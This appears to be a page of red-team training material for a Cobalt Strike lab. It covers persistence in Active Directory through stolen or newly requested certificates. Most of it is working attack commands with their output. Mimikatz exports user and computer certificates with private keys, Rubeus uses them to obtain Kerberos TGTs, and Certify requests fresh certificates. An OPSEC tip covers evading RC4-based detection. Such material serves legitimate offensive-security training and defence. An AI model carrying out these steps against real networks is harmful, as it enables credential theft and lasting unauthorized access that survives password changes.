User & Computer Persistence
Certificates can also be useful for maintaining persistent access to both users and computers, because they tend to have a longer shelf-life compared to passwords. For example, User certificates are valid for an entire year by default, regardless of password changes.
CA Name : dc-2.dev.cyberbotic.io\sub-ca
Template Name : User
Schema Version : 1
Validity Period : 1 year
\
Certificates only become invalid if they're revoked by the CA (or expire). This also does not rely on any vulnerable templates. We can extract certificates that have already been issued, or just request new ones.
\
User Persistence
User certificates that have already been issued can be found in the user's Personal Certificate store.
\

\
If we have a Beacon running on their machine, we can enumerate their certificates with Seatbelt.
beacon> getuid
[*] You are DEV\nlamb
beacon> run hostname
wkstn-1
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
StoreLocation : CurrentUser
Issuer : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
Subject : E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
ValidDate : 9/7/2022 11:44:35 AM
ExpiryDate : 9/7/2023 11:44:35 AM
HasPrivateKey : True
KeyExportable : True
Thumbprint : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
Template : User
EnhancedKeyUsages :
Encrypting File System
Secure Email
Client Authentication [!] Certificate is used for client authentication!
Always ensure the certificate is used for client authentication.
\
Certificates can be exported with Mimikatz using crypto::certificates
(although it drops them to disk).
beacon> mimikatz crypto::certificates /export
Public export : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'
beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:\Users\nlamb\CURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete
Go to View > Downloads to sync files from Cobalt Strike to your local machine.
\
Base64 encode the pfx file.
ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0
\
Then use it with Rubeus to obtain a TGT. The export password will be mimikatz
.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap
[*] Using PKINIT with etype rc4_hmac and subject: E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQj[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 12:28:51 PM
EndTime : 9/7/2022 10:28:51 PM
RenewTill : 9/14/2022 12:28:51 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : Cptkd+BVLZ8+NS11BQQ6Zg==
ASREP (key) : 79C05DC0CC7909DF6448F1B24FAFBD71
OPSEC
You may notice that this will request RC4 tickets by default. You can force the use of AES256 by including the /enctype:aes256
parameter.
\
If the user does not have a certificate in their store, we can just request one with Certify. \
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User
\
\
Computer Persistence
The same can be applied to computer accounts, but we must elevate to extract those certificates.
\

\
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
Public export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGYD[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : WKSTN-1$
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 12:06:02 PM
EndTime : 9/7/2022 10:06:02 PM
RenewTill : 9/14/2022 12:06:02 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
ASREP (key) : C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF
\
If requesting a machine certificate with Certify, the /machine
parameter is required to auto-elevate to SYSTEM and assume the identity of the computer account.
\
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine
Last updated